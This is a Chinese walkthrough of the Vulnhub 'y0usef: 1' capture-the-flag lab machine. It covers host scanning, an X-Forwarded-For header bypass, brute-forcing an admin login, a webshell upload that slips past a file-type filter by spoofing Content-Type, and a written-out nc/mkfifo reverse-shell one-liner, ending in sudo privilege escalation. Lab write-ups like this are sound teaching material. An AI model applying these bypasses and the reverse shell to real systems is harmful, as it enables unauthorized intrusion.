Vulnhub y0usef: 1 – 作者:WAFmax

y0usef: 1

基本信息

难度:简单 操作比较容易,但是有的地方需要开一开脑洞,发挥一下想象力
图片.png

靶机搭建

下载镜像导入成功1运行之后会显示该界面

图片.png

链接:https://www.vulnhub.com/entry/y0usef-1,624/

主机发现与端口扫描

因为靶机与kali在同一个网段下可以使用nmap扫描获取靶机地址

nmap 192.168.56.0/24

发现靶机地址为192.168.56.105
对改地址进行详细的端口扫描

nmap -sV -p- -A 192.168.56.105

获取到开放了22,80端口以及版本信息

图片.png

访问80端口发现页面中没有什么可以利用的信息
图片.png

使用dirb进行扫描但是没有发现可利用信息,可能是字典不够强大
图片.png

换一个工具再试一下,使用dirsearch进行扫描,发现存在301重定向页面

图片.png

访问查看一下
图片.png
可以尝试一下通过burp抓包增加一个请求头看看能否实现重定向
请求头:X-Forwarded-For:127.0.0.1
图片.png

成功进入到登录界面

图片.png

可以使用burp进行暴力破解
使用最常用的top100字典进行破解就可以
破解之后发现这是最简单的弱口令密码
注:需要添加请求头才可以

图片.png

发现账号和密码都是admin,进行登录
登录成功,发现可以上传文件,尝试上传木马使用哥斯拉进行连接
图片.png发现直接长传.php文件会被过滤

图片.png使用burp修改数据包进行绕过,一般当Content-Type为图片类型时可以成功上传
这里使用image/png进行修改
上传成功获得路径
http://192.168.56.105/adminstration/upload/files/16127499112.php
图片.png

使用哥斯拉进行连接
成功连接
图片.png

获取shell

进入命令行反弹shell,使用nc进行连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 1234>/tmp/f

成功反弹shell
图片.png建立交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

在home目录下发现user.txt进行查看发现是base64加密

图片.png

解密之后获得账号与密码

图片.png

user : yousef
pass : yousef123
通过ssh建立远程连接获取一个稳定的操作环境
图片.png

提权

sudo -l

查看可使用命令

图片.png

发现yousef可以执行所有命令
直接su root 获取root权限
成功提权
图片.png

进入root目录下获取最后一个flag

图片.png

解密之后获取答案
图片.png

来源:freebuf.com 2021-02-08 10:23:31 by: WAFmax

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论